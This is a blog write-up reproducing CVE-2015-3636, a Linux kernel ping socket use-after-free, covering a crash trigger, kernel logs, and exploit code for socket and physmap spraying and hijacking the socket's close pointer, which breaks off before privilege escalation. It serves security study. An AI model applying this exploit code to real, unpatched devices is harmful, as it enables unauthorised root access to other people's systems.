CVE-2015-3636 Ping Pong
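Note
An old CVE that I reproduced; as I recall, it was also meant for a presentation in my graduate Advanced Operating Systems course. Although I still only half understand the ret2dir part (I will definitely write a blog post someday to fill that hole), the ideas I picked up during this reproduction, the brute-force tricks and locating a successfully freed object through a pattern, did quietly pay off in some later CTFs. For example, in some pipe_buffer challenges I would instinctively write different lengths to serve as a signature.
Original post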
Let’s play ping-pong in the Linux kernel
Before Anything
CVE-2015-3636, or ping-pong root, is an infamous Use After Free vulnerability disclosed by the Keen Team. For its influence and the potential damage it could have brought to all Linux-kernel-based devices, Android phones for example, it was honored with the Best Privilege Escalation Bug at the Pwnie Awards 2015 [1].
Cool enough, but 2015 is a long time ago. To analyze this amazing vulnerability, I chose the Android goldfish Linux 3.10.0 kernel as the research target. You can browse the source code through this link [2].
In the following, I will introduce the details of this bug and trigger it to crash the Linux kernel. Last but not least, I will try to write an exploit from scratch together with you (and tell the stories of my failures along the way, for sure).
Pre-knowledge
Before introducing the bug, I think it is worth covering some interesting background on the Linux network internals.
When you want to create a network socket, the system call is described below:
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
int socket(int domain, int type, int protocol);
The domain argument specifies a communication domain; for the IPv4 Internet protocol family we are interested in, that is the AF_INET macro. The type argument is chosen from [SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, ...], representing a byte-stream connection, a datagram connection, raw network access, and so on. More specifically, the choice of domain affects the valid choices of type and protocol. For instance, with AF_INET as the first argument, the protocol argument is typically picked from IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP and IPPROTO_IP.
int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
So how does the kernel handle this system call? The SyS_socket() entry point calls sock_create(), which in turn calls __sock_create(). In __sock_create(), the kernel chooses the protocol family handler based on the argument and calls the corresponding create function, as below.
pf = rcu_dereference(net_families[family]);
/* ... */
err = pf->create(net, sock, protocol, kern);
For the AF_INET protocol family, inet_create() then takes over and goes further by picking the specific protocol, tcp_prot in this case.
One pair of lines inside inet_create() is pretty juicy.
/* Add to protocol hash chains. */
sk->sk_prot->hash(sk);
What are the protocol hash chains? To the best of my knowledge, the struct sock is inserted into a hash table to speed up finding the right socket when related packets are received. Hashing stands for speed and optimization, and a socket that has been hashed must also be unhashed when it is destroyed (each prot struct has its own unhash function pointer).
However, optimization sometimes brings danger. :(
The Bug itself
The real amazing bug in the wild internal just make me feel like an idiot. –my captain of the CTF team
The erroneous code is in the function ping_unhash() of the file net/ipv4/ping.c.
void ping_unhash(struct sock *sk)
{
struct inet_sock *isk = inet_sk(sk);
pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
if (sk_hashed(sk)) {
write_lock_bh(&ping_table.lock);
hlist_nulls_del(&sk->sk_nulls_node);
sock_put(sk);
isk->inet_num = 0;
isk->inet_sport = 0;
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
write_unlock_bh(&ping_table.lock);
}
}
Of course, we cannot tell exactly what happens from such helper-heavy code alone, so let me show you more details.
// include/net/sock.h
static inline bool sk_unhashed(const struct sock *sk)
{
return hlist_unhashed(&sk->sk_node);
}
static inline bool sk_hashed(const struct sock *sk)
{
return !sk_unhashed(sk);
}
/* ...some far place in include/linux/list.h... */
static inline int hlist_unhashed(const struct hlist_node *h)
{
return !h->pprev;
}
And this one.
// include/linux/list_nulls.h
static inline void hlist_nulls_del(struct hlist_nulls_node *n)
{
__hlist_nulls_del(n);
n->pprev = LIST_POISON2;
}
The last and spicy one.
// include/net/sock.h
struct sock {
struct sock_common __sk_common;
#define sk_node __sk_common.skc_node
#define sk_nulls_node __sk_common.skc_nulls_node
/* ...... */
};
// include/net/sock.h
struct sock_common {
/* ... */
union {
struct hlist_node skc_node;
struct hlist_nulls_node skc_nulls_node;
};
/* ... */
};
Okay then, having read the code snippets above, can you find the interesting bug here?
–A split line–
Whether you did or not, let me talk about it. When ping_unhash() is called, it checks whether this sock has been hashed before, using the sk_hashed() helper. The code above shows that it merely checks whether the pprev of the node is non-NULL (NULL means the node is on no hash list). If so, it enters the following block and does the unhash job, deleting the node from the hash list by calling hlist_nulls_del().
That sounds pretty legitimate. However, after hlist_nulls_del() removes the node, it assigns LIST_POISON2 instead of NULL to the pprev of that node, which means that the next time ping_unhash() is called, the socket still looks hashed and the unhash job is done again.
And that is not what we expect, not at all.
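To make the flaw concrete, here is a minimal user-space sketch of the two helpers involved. It is only a model: the names node, model_hashed, model_add_head, model_del and model_del_fixed are made up for illustration, and the list ends with a plain NULL instead of the kernel's "nulls" marker. Only the pprev logic and the LIST_POISON2 value (0x00200200, the address that shows up in the crash log further down) come from the snippets above. The "fixed" variant, which resets pprev to NULL after deletion, is my assumption of what a fix has to achieve, not a copy of the actual patch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for struct hlist_nulls_node. */
struct node {
    struct node *next;
    struct node **pprev;
};

#define MODEL_LIST_POISON2 ((struct node **)(uintptr_t)0x00200200)

/* Mirrors hlist_unhashed()/sk_hashed(): "hashed" only means pprev != NULL. */
static int model_hashed(const struct node *n)
{
    return n->pprev != NULL;
}

/* Simplified hlist_nulls_add_head(): link n at the head of the list. */
static void model_add_head(struct node *n, struct node **head)
{
    n->next = *head;
    n->pprev = head;
    if (*head)
        (*head)->pprev = &n->next;
    *head = n;
}

/* Mirrors hlist_nulls_del(): unlink, then poison pprev instead of clearing it. */
static void model_del(struct node *n)
{
    *n->pprev = n->next;          /* a second call would write through 0x200200 */
    if (n->next)
        n->next->pprev = n->pprev;
    n->pprev = MODEL_LIST_POISON2;
}

/* Assumed fix: clear pprev so that a second unhash is skipped. */
static void model_del_fixed(struct node *n)
{
    model_del(n);
    n->pprev = NULL;
}
```

After model_del() the node is off the list, yet model_hashed() still reports it as hashed, which is exactly the state ping_unhash() trips over on its second call.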
Triggering
Now we aim to trigger this unexpected double unhashing. To save your time, I will directly (shamelessly) use the open-source trigger code and analyze it afterward.
// trigger.c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char* argv[])
{
int sock, ret;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
sa.sin_family = AF_UNSPEC;
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
return 0;
}
Compile this code and run it on the vulnerable machine (emulated by QEMU), and it will reliably crash the kernel as below.
$ (first adb push the binary and adb shell into the emulator)
$ ./trigger
Unable to handle kernel paging request at virtual address 00200200
pgd = ffffffc03db3b000
[00200200] *pgd=000000007db3e003, *pmd=0000000000000000
Internal error: Oops: 94000046 [#1] SMP
Modules linked in:
CPU: 0 PID: 898 Comm: poc Not tainted 3.10.0+ #1
task: ffffffc03eddd100 ti: ffffffc03db44000 task.ti: ffffffc03db44000
PC is at ping_unhash+0x30/0xa4
LR is at ping_unhash+0x28/0xa4
pc : [<ffffffc0003c4d8c>] lr : [<ffffffc0003c4d84>] pstate: 80000145
sp : ffffffc03db47da0
x29: ffffffc03db47da0 x28: ffffffc03db44000
x27: ffffffc0005dc000 x26: 00000000000000cb
x25: 0000000000000116 x24: 0000000000000015
x23: 0000000000000000 x22: 0000007fef136f6c
x21: 0000000000000010 x20: ffffffc00045a000
x19: ffffffc03db32300 x18: 0000007faa0ce000
x17: 0000007fef1366b0 x16: ffffffc000346e8c
x15: 000000000047c927 x14: 000000000047c903
x13: 0000000000000000 x12: 000000000047c8df
x11: 00000000ffffffff x10: 00000000ffffffff
x9 : 0000000000000000 x8 : 00000000000000cb
x7 : 7f7f7f7f7f7f7f7f x6 : 0000000000000000
x5 : 0000000000000001 x4 : ffffffc0003bb928
x3 : 0000000000000002 x2 : 0000000000000000
x1 : 0000000000200200 x0 : 0000000000000003
......
Call trace:
[<ffffffc0003c4d8c>] ping_unhash+0x30/0xa4
[<ffffffc0003af350>] udp_disconnect+0x84/0xe4
[<ffffffc0003bb9d8>] inet_dgram_connect+0xb0/0xdc
[<ffffffc000346f04>] SyS_connect+0x78/0xcc
Code: 91080000 940247d4 f9401e61 f9401a60 (f9000020)
---[ end trace 937e3c3edcc9779b ]---
Kernel panic - not syncing: Fatal exception in interrupt
In addition, if you get an error like Permission denied when creating the socket, you have to fix the permission issue. I just use the command sysctl -w net.ipv4.ping_group_range="0 2147483647" to allow ICMP sockets to be created through the system call.
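Before running the trigger, it can save some confusion to check whether the current user is allowed to create a ping socket at all. The helper below is a small sketch of such a check; ping_socket_available is a name I made up, and it only wraps the same socket() call the trigger uses.

```c
#include <assert.h>
#include <errno.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* Returns 0 if an unprivileged ICMP ("ping") socket can be created,
 * otherwise the negated errno reported by socket(). */
static int ping_socket_available(void)
{
    int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

    if (fd < 0)
        return -errno;
    close(fd);
    return 0;
}
```

A negative return value here means the ping_group_range setting (or some other policy on the machine) still blocks the socket, so the trigger would fail before reaching the bug.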
Well done, let’s analyze how the trigger works.
It first creates an AF_INET socket with the SOCK_DGRAM and IPPROTO_ICMP arguments. That is sensible as we are going to attack the ping protocol, which is part of ICMP. As for why SOCK_DGRAM is picked, let’s go further.
The code then calls connect(sock, (const struct sockaddr *) &sa, sizeof(sa)); with AF_INET as sa.sin_family. Let’s dig deeper to see what happens.
The entry point of the connect system call is SyS_connect, defined in net/socket.c as below.
SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
int, addrlen)
{
struct socket *sock;
struct sockaddr_storage address;
int err, fput_needed;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (!sock)
goto out;
err = move_addr_to_kernel(uservaddr, addrlen, &address);
if (err < 0)
goto out_put;
err =
security_socket_connect(sock, (struct sockaddr *)&address, addrlen);
if (err)
goto out_put;
err = sock->ops->connect(sock, (struct sockaddr *)&address, addrlen,
sock->file->f_flags);
out_put:
fput_light(sock->file, fput_needed);
out:
return err;
}
It fetches the actual socket struct using the user-supplied fd, copies the address into kernel space, does the security check, and reaches the socket-specific connect operation. In this case it jumps to inet_dgram_connect(), because the socket was created with the SOCK_DGRAM type and therefore uses the inet_dgram_ops operation struct.
int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
int addr_len, int flags)
{
struct sock *sk = sock->sk;
if (addr_len < sizeof(uaddr->sa_family))
return -EINVAL;
if (uaddr->sa_family == AF_UNSPEC)
return sk->sk_prot->disconnect(sk, flags);
if (!inet_sk(sk)->inet_num && inet_autobind(sk))
return -EAGAIN;
return sk->sk_prot->connect(sk, uaddr, addr_len);
}
As this connect is called with the AF_INET family argument, it passes the first two checks and enters inet_autobind(). That function in turn calls the socket-specific get_port method.
static int inet_autobind(struct sock *sk)
{
/* ... */
if (sk->sk_prot->get_port(sk, 0)) {
release_sock(sk);
return -EAGAIN;
}
/* ... */
In this case, that results in a call to ping_get_port(). There the kernel hashes the socket into its ping_hashslot bucket to speed up lookups. (What is weird is that ping_hash itself is just an empty function…)
int ping_get_port(struct sock *sk, unsigned short ident)
{
/* ... */
if (sk_unhashed(sk)) {
pr_debug("was not hashed\n");
sock_hold(sk);
hlist_nulls_add_head(&sk->sk_nulls_node, hlist);
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
}
/* ... */
}
Look familiar? This is symmetrical to the ping_unhash() function. In fact, this is how a ping socket gets hashed, and that is the purpose of the first connect system call.
So what about the other two connect calls? They are designed to call into ping_unhash() twice. See the code snippet of inet_dgram_connect() above: when the AF_UNSPEC value is supplied, connect bails out and falls into the disconnect method, which is udp_disconnect() here. In that function, if the socket has not been bound to a specific port, it calls the unhash method, which is our vulnerable target, ping_unhash().
That is, we can go into ping_unhash() twice and trigger the bug. But wait a moment, what about the crash?
BUG: unable to handle kernel paging request at 00200200
Disassembling vmlinux and locating the precise position, we can find that the fault happens here.
// static inline void __hlist_nulls_del(struct hlist_nulls_node *n)
*pprev = next;
This is because n->pprev was already changed to LIST_POISON2 by the first connect with AF_UNSPEC. When pprev is dereferenced this time, it points to an unmapped address and thus causes the kernel panic.
Exploiting
We now have a pointer dereference in the user-level address space, which is rather limited for constructing a useful primitive.
To keep the kernel from crashing right here, so that we can reach another vulnerable point, the attacker can call the mmap system call to map this address.
Thankfully, after hlist_nulls_del() finishes, the sock_put() call can be used to produce a Use After Free of the sock object.
/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk)
{
if (atomic_dec_and_test(&sk->sk_refcnt)) // <- dec twice and free
sk_free(sk);
}
No RCU, no strict checking, what a strong and stable Use After Free trigger…
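The reference counting behind this can be replayed with a tiny user-space model. Everything here is hypothetical naming (model_sock, model_trigger, and so on), and it rests on two assumptions: that a freshly created socket starts with a reference count of 1, owned by the file descriptor, and that the hashing connect() adds one more through sock_hold() in ping_get_port().

```c
#include <assert.h>

/* Hypothetical model of the reference count on one ping socket. */
struct model_sock {
    int refcnt;
    int freed;
};

/* Assumed state right after socket(): one reference, held by the fd. */
static void model_socket(struct model_sock *sk)
{
    sk->refcnt = 1;
    sk->freed = 0;
}

/* sock_hold(): taken when the socket is hashed. */
static void model_hold(struct model_sock *sk)
{
    sk->refcnt++;
}

/* sock_put(): drop one reference and free on the last one. */
static void model_put(struct model_sock *sk)
{
    assert(sk->refcnt > 0);
    if (--sk->refcnt == 0)
        sk->freed = 1;
}

/* Replays the trigger: one hashing connect(), then a number of
 * AF_UNSPEC connects that each reach the buggy ping_unhash().
 * Returns 1 if the object is freed while the fd is still open. */
static int model_trigger(int unspec_connects)
{
    struct model_sock sk;
    int i;

    model_socket(&sk);
    model_hold(&sk);
    for (i = 0; i < unspec_connects; i++)
        model_put(&sk);
    return sk.freed;
}
```

One AF_UNSPEC connect only drops the reference taken by hashing; the second one drops the reference that belongs to the still-open file descriptor, and that is the Use After Free.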
With the Use After Free in hand, the next step is to turn it into an exploitable one.
Allocating and Releasing
To do that, we first find the place where the sock is allocated. When the socket system call is used, inet_create() calls sk_alloc(), which in turn calls sk_prot_alloc(); both are defined in net/core/sock.c.
static struct sock *sk_prot_alloc(struct proto *prot, gfp_t priority,
int family)
{
struct sock *sk;
struct kmem_cache *slab;
slab = prot->slab;
if (slab != NULL) {
sk = kmem_cache_alloc(slab, priority & ~__GFP_ZERO);
if (!sk)
return sk;
if (priority & __GFP_ZERO) {
if (prot->clear_sk)
prot->clear_sk(sk, prot->obj_size);
else
sk_prot_clear_nulls(sk, prot->obj_size);
}
} else
sk = kmalloc(prot->obj_size, priority);
/* ... */
In this function, the sock is allocated by kmem_cache_alloc() if the slab member is not NULL; otherwise kmalloc() is used.
In our case, the core inet_init() function calls proto_register() with ping_prot as the argument and the alloc_slab flag set to true. Thus a kmem_cache object is created with PING as its name.
prot->slab = kmem_cache_create(prot->name, prot->obj_size, 0,
SLAB_HWCACHE_ALIGN | prot->slab_flags,
NULL);
// Through debugging, the prot->name = "PING", prot->obj_size = 0x270,
// align = 0, flags = 0x2000 (should be just SLAB_HWCACHE_ALIGN)
// In addition, per PING slub will have 2 pages and max 16 objects
Symmetrically, the corresponding release of the object is done in the sk_prot_free() function.
static void sk_prot_free(struct proto *prot, struct sock *sk)
{
struct kmem_cache *slab;
struct module *owner;
owner = prot->owner;
slab = prot->slab;
security_sk_free(sk);
if (slab != NULL)
kmem_cache_free(slab, sk);
else
kfree(sk);
module_put(owner);
}
UAF primitive
By now we understand how the object is allocated and released. After successfully triggering ping_unhash() twice, and with it the sock_put() of a socket whose file descriptor is still in use, obtaining a malicious primitive is our next target. Looking at the content of struct sock, there are plenty of pointers to hunt for.
A direct idea for exploiting is to forge the skc_prot element in __sk_common so that it points to a user-controlled object, and to point the close method of that structure at the backdoor function. Then, when the user calls close on this socket, the malicious code is executed.
In order to do that, a clever spraying solution is needed. Traditionally, an already freed object can be reclaimed with add_key, sendmsg, and setxattr. However, the ping sock object is allocated from the dedicated PING kmem_cache, which is a severe limitation.
For example, you can create another PING socket to reclaim the freed ping sock object, but you cannot fill it with what you want because the content of that sock is set by the initialization handler.
To overcome the constraint, the author tries another crazy idea: physmap spraying. That is a building block of the attack method named ret2dir, proposed at USENIX Security 2014. Although it sounds like a complicated and intricate hacking skill, the idea behind it is super simple. The attacker creates thousands of ping sock objects, filling the PING kmem_cache with an excess of slab pages, and then selectively releases part of them so that whole pages are given back. Once a slab page holding a vulnerable sock is given back, it may be handed out again by userspace page fault handling. I won’t explain the details here; you may refer to this blog of mine if interested.
P.S. To be honest, even though my tiny experiment with mmap and the slub allocator was done in an x86 environment, I failed in that case (the reason will be provided later). So to ease my burden, I will pick an environment from an existing CTF problem (ensuring that I already have a valid answer ;D). The target kernel is labeled version 3.10+, which shouldn’t make much difference for our exploit. If you are interested, try to implement this on other architectures. Last but not least, you can refer to this GitHub repo [3] if you want a quick test.
Fetch the ‘double-freed’ socket
The first step of our plan is to adopt socket spraying as well as physmap spraying to implement a UAF primitive. Let’s convert the idea into exploit code.
“Talk is cheap, show me the code.” So let’s write some code snippets.
int main(int argc, char* argv[])
{
prepare(...);
// We can do some preparation here, maximize the resources for example
protection(...);
// Then we should do `mmap` of the poison value to avoid early crash
spraying(...);
// We should create vulnerable sockets as well as spraying lots of ping sock objects here
fetching(...);
// Then we can do lots of mmap here, trying to fetch the target page
close(...the fetch socket...);
}
The above is just a bare-bones outline; let’s implement it step by step. Before launching the attack, some preparation has to be done.
void prepare(void)
{
printf("[+] Start prepare...\n");
/* maximize the fd limit to enable spraying */
struct rlimit rlim;
int ret;
ret = getrlimit(RLIMIT_NOFILE, &rlim);
if (ret != 0) errhandler("[!] prepare().getrlimit-1");
rlim.rlim_cur = rlim.rlim_max;
ret = setrlimit(RLIMIT_NOFILE, &rlim);
if (ret != 0) errhandler("[!] prepare().setrlimit");
ret = getrlimit(RLIMIT_NOFILE, &rlim);
if (ret != 0) errhandler("[!] prepare().getrlimit-2");
printf("[~] Done prepare!\n");
}
Here we just use the setrlimit system call to maximize the number of sockets we can ask for. This is essential for the later heap spraying, as we have to create enough sockets to make sure their memory can end up overlapping with the physmap region.
Then we add simple protection in case our exploit crashes the kernel at an early stage.
void protection(void)
{
printf("[+] Start protection...\n");
int i;
void* protect = mmap(PROTECT_BASE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
if(MAP_FAILED == protect) errhandler("[!] protection().mmap");
for(i = 0; i < MAX_NULLMAP_SIZE / PAGE_SIZE; i++)
memset((char *)protect + PAGE_SIZE * i, 0x90, PAGE_SIZE);
printf("[~] Done protection!\n");
}
The PROTECT_BASE in our experiments should be 0x200000, as the invalid memory dereference is at 0x200200. After we mmap that address range, the page fault is no longer triggered (assuming no SMAP-style protection).
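The base address is simply the faulting address rounded down to a page boundary, since a MAP_FIXED mapping has to start on one. A one-function sketch, assuming 4 KiB pages (MODEL_PAGE_SIZE and page_align_down are illustrative names, not taken from the exploit):

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_PAGE_SIZE 0x1000UL   /* assumption: 4 KiB pages */

/* Round an address down to the start of the page that contains it. */
static uintptr_t page_align_down(uintptr_t addr)
{
    return addr & ~(uintptr_t)(MODEL_PAGE_SIZE - 1);
}
```

Feeding it the poison address 0x200200 gives 0x200000, the PROTECT_BASE used above.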
So far so good, let’s spray those vulnerable sockets now.
void spraying(void)
{
printf("[+] Start socket spraying...\n");
int i, ret;
struct sockaddr _sockaddr1 = { .sa_family = AF_INET };
struct sockaddr _sockaddr2 = { .sa_family = AF_UNSPEC };
for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
{
vultrig_socks[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
if(vultrig_socks[i] < 0) errhandler("[!] spraying().socket-create vultrig sockets");
ret = connect(vultrig_socks[i], &_sockaddr1, sizeof(_sockaddr1));
if(ret < 0) errhandler("[!] spraying().connect-hashing the socket");
}
for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
{
ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
if(ret < 0) errhandler("[!] spraying().connect-free once");
ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
if(ret < 0) errhandler("[!] spraying().connect-free twice");
}
printf("[~] Done socket spraying!\n");
printf("[+] Start physmap spraying...\n");
memset(physmap_spray_pages, 0, sizeof(physmap_spray_pages));
memset(physmap_spray_children, 0, sizeof(physmap_spray_children));
physmap_spray_pages_count = 0;
for(i = 0; i < MAX_PHYSMAP_SPRAY_PROCESS; i++)
{
int j;
void* mapped;
void* mapped_page;
mapped = mmap(NULL, MAX_PHYSMAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
if (mapped == MAP_FAILED) errhandler("[!] spraying().mmap");
for(j = 0; j < MAX_PHYSMAP_SIZE / PAGE_SIZE; j++)
{
memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);
mapped_page = (void *)((char *)mapped + PAGE_SIZE * j);
*(unsigned long *)((char *)mapped_page + 0x1D8) = MAGIC_VALUE + physmap_spray_pages_count;
// special magic for quick identify
physmap_spray_pages[physmap_spray_pages_count] = mapped_page;
physmap_spray_pages_count++;
}
}
printf("[~] Done physmap spraying!\n");
}
The spraying parameters are tedious to tune, so I just copied them from a working exploit, and fortunately they work. In this function, we create MAX_VULTRIG_SOCKS_COUNT sockets and do what we did in the PoC code (hash each socket, then release it). After that, we have plenty of released struct sock objects in hand.
Then we start physmap spraying, hoping that with a large mmap space we can reclaim one of those released sock objects. To test that, we can use the ioctl + SIOCGSTAMPNS trick, which retrieves a specific field of the struct sock behind the given socket. That is to say, if we fill that field with an identifiable magic value, we can use this ioctl to verify whether a given socket is a vulnerable one that now lives in our pages. The code is shown below.
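Why does the magic value survive the trip through a struct timespec? The sketch below assumes that the kernel treats the 8 bytes at that field as a plain count of nanoseconds and splits it into seconds and nanoseconds; the exploit then recombines the two halves. The model_ names are hypothetical, and the sample value is the magic printed in the run shown later.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_NSEC_PER_SEC 1000000000ULL

struct model_timespec {
    uint64_t tv_sec;
    uint64_t tv_nsec;
};

/* Assumed kernel side: split a raw nanosecond count into a timespec. */
static struct model_timespec model_ns_to_timespec(uint64_t ns)
{
    struct model_timespec ts;

    ts.tv_sec = ns / MODEL_NSEC_PER_SEC;
    ts.tv_nsec = ns % MODEL_NSEC_PER_SEC;
    return ts;
}

/* Exploit side: the same recombination that fetching() performs. */
static uint64_t model_timespec_to_ns(struct model_timespec ts)
{
    return ts.tv_sec * MODEL_NSEC_PER_SEC + ts.tv_nsec;
}
```

For the magic 0x4b625e33 the split gives 1 second and 264737843 nanoseconds, and recombining them returns the original value, so the comparison against the sprayed pages works.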
void fetching(void)
{
printf("[+] Start fetching the UAF socket...\n");
struct timespec time;
uint64_t value;
void* page = NULL;
int j = 0;
int got = 0;
int index = MAX_VULTRIG_SOCKS_COUNT / 2;
do
{
exp_sock = vultrig_socks[index];
memset(&time, 0, sizeof(time));
ioctl(exp_sock, SIOCGSTAMPNS, &time);
value = ((uint64_t)time.tv_sec * NSEC_PER_SEC) + time.tv_nsec;
for(j = 0; j < physmap_spray_pages_count; j++)
{
page = physmap_spray_pages[j];
if(value == *(unsigned long *)((char *)page + 0x1D8)) // value equals to what we filled
{
printf("[*] obtained magic:0x%llx\n", (unsigned long long)value);
got = 1;
payload = page; // The vulnerable socket is located in this page
break;
}
}
index += 1;
}
while(!got && index < MAX_VULTRIG_SOCKS_COUNT);
if(got == 0) errhandler("[!] fetching() fail...");
printf("[~] Done fetching the UAF socket!\n");
}
Now we can check whether the UAF succeeded. (The entire code can be downloaded here: https://gist.github.com/f0rm2l1n/31ab1d42e0e18f94a5ce928816a5f65c)
# user screen
$ # also need adb push the code
$ ./exp1
[+] Start prepare...
[~] Done prepare!
[+] Start protection...
[~] Done protection!
[+] Start socket spraying...
[~] Done socket spraying!
[+] Start physmap spraying...
[~] Done physmap spraying!
[+] Start fetching the UAF socket...
[*] obtained magic:0x4b625e33
[~] Done fetching the UAF socket!
# kernel dmesg
.......
IPv4: Attempt to release alive inet socket ffffffc032400000
IPv4: Attempt to release alive inet socket ffffffc032400300
IPv4: Attempt to release alive inet socket ffffffc032400600
IPv4: Attempt to release alive inet socket ffffffc032400900
IPv4: Attempt to release alive inet socket ffffffc032400c00
IPv4: Attempt to release alive inet socket ffffffc032400f00
IPv4: Attempt to release alive inet socket ffffffc032401200
IPv4: Attempt to release alive inet socket ffffffc032401500
IPv4: Attempt to release alive inet socket ffffffc032401800
IPv4: Attempt to release alive inet socket ffffffc032401b00
IPv4: Attempt to release alive inet socket ffffffc032402000
IPv4: Attempt to release alive inet socket ffffffc032402300
IPv4: Attempt to release alive inet socket ffffffc032402600
IPv4: Attempt to release alive inet socket ffffffc032402900
IPv4: Attempt to release alive inet socket ffffffc032402c00
IPv4: Attempt to release alive inet socket ffffffc032402f00
IPv4: Attempt to release alive inet socket ffffffc032403200
IPv4: Attempt to release alive inet socket ffffffc032403500
IPv4: Attempt to release alive inet socket ffffffc032403800
IPv4: Attempt to release alive inet socket ffffffc032403b00
IPv4: Attempt to release alive inet socket ffffffc032404000
Unable to handle kernel paging request at virtual address 4141414141414141
pgd = ffffffc03dbcb000
[4141414141414141] *pgd=0000000000000000
Internal error: Oops: 94000005 [#1] SMP
Modules linked in:
CPU: 0 PID: 945 Comm: exp1 Not tainted 3.10.0+ #1
task: ffffffc03ed32d00 ti: ffffffc03dbd4000 task.ti: ffffffc03dbd4000
PC is at ip_mc_drop_socket+0x34/0xa8
LR is at ip_mc_drop_socket+0x24/0xa8
pc : [<ffffffc0003bdc0c>] lr : [<ffffffc0003bdbfc>] pstate: 60000145
sp : ffffffc03dbd7d90
x29: ffffffc03dbd7d90 x28: ffffffc03dbd4000
x27: ffffffc0005dc000 x26: 0000000000000039
x25: ffffffc03daf7710 x24: ffffffc030c31430
x23: ffffffc00045a000 x22: ffffffc031620000
x21: ffffffc03ebf8180 x20: ffffffc0316200e8
x19: 4141414141414141 x18: 0000007f94698000
x17: 0000000000000000 x16: ffffffc000141878
x15: 00000000004a7d04 x14: 0000000000000010
x13: 0a2174656b636f73 x12: 2046415520656874
x11: 0000000000000000 x10: 0000007f93817108
x9 : 6d313e33a48870ce x8 : 0000000000000039
x7 : ffffffc000617038 x6 : 0000000000000000
x5 : 0000000000000000 x4 : 0000000000000000
x3 : 0000000041414141 x2 : 0000000000000000
x1 : 0000000000000000 x0 : ffffffc03ed32d00
...
Call trace:
[<ffffffc0003bdc0c>] ip_mc_drop_socket+0x34/0xa8
[<ffffffc0003b9fd0>] inet_release+0x48/0x94
[<ffffffc000344d58>] sock_release+0x20/0x9c
[<ffffffc000344de0>] sock_close+0xc/0x1c
[<ffffffc0001439bc>] __fput+0x98/0x23c
[<ffffffc000143c20>] ____fput+0x8/0x14
[<ffffffc0000b5048>] task_work_run+0x94/0xec
[<ffffffc000088070>] do_notify_resume+0x50/0x64
Code: 9103a2d4 b00004f7 f94146d3 b4000313 (f9400260)
In fact, the UAF is not one hundred percent reliable, so run it again if the result does not match the expectation.
Cool! The kernel crashed because of a page fault at 0x4141414141414141, which is obviously what we filled in during our mmap spraying.
memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);
We can look into the source code to understand this panic. It happens in the function void ip_mc_drop_socket(struct sock *sk), which is called by inet_release().
{
struct inet_sock *inet = inet_sk(sk);
struct ip_mc_socklist *iml;
struct net *net = sock_net(sk);
if (inet->mc_list == NULL)
return;
/* .... */
}
This function first obtains the variable inet from sock, which is now filled with 0x41 bytes. It then reads the mc_list field of inet, finds the non-NULL value 0x4141414141414141, and faults when it dereferences that pointer. To avoid that, we can place a NULL value in this field.
PC hijacking
As we already have a controllable UAF primitive, it’s time to look for a useful code or data pointer for further exploitation. As discussed above, hijacking the skc_prot field of __sk_common in struct sock is an applicable way, since inet_release() makes an indirect call through it.
int inet_release(struct socket *sock)
{
struct sock *sk = sock->sk;
if (sk) {
/* ... */
sk->sk_prot->close(sk, timeout); // very juicy
}
return 0;
}
You can refer to here for the details of struct proto. The related code looks like this.
struct proto* fakeproto = malloc(sizeof(struct proto));
fakeproto->close = /* what we want to go */;
*(unsigned long *)((char *)payload + 40) = (unsigned long)fakeproto;
Privilege Escalation
So what to do next seems quite clear: can we write a user-mode backdoor and directly call commit_creds() as usual? Unfortunately, the answer is no, and it really hit me after testing. The kernel shows an error message like the one below.
Bad mode in Synchronous Abort handler detected, code 0x8400000f
CPU: 0 PID: 914 Comm: exp2 Not tainted 3.10.0+ #1
task: ffffffc03ecd5100 ti: ffffffc03db60000 task.ti: ffffffc03db60000
PC is at 0x400c30
LR is at inet_release+0x84/0x94
Well, what happened? After googling around, I found that the ARM architecture carries its own security attributes inside its page tables, which I had not run into on x86. You can look up the manual or this description for details. In a nutshell, the ARM architecture has fine-grained access permissions for different memory locations, enabling separation between EL0 (unprivileged) and the privileged modes. Thus, directly returning to malicious user code does not work here.
Fine, time to learn and try something new. As we cannot execute the code we write, we can use the kernel ROP technique instead.
For a newbie like me, it’s quite hard to do it all by myself (constructing a ROP chain, bypassing PXN, leaking task_struct…). Thus, I just want to understand and modify others’ code for successful exploitation. Because CVE-2015-3636 is a famous and old bug, you can find many resources for this.
We simply borrow others’ code as below.
Hijacking addr_limit
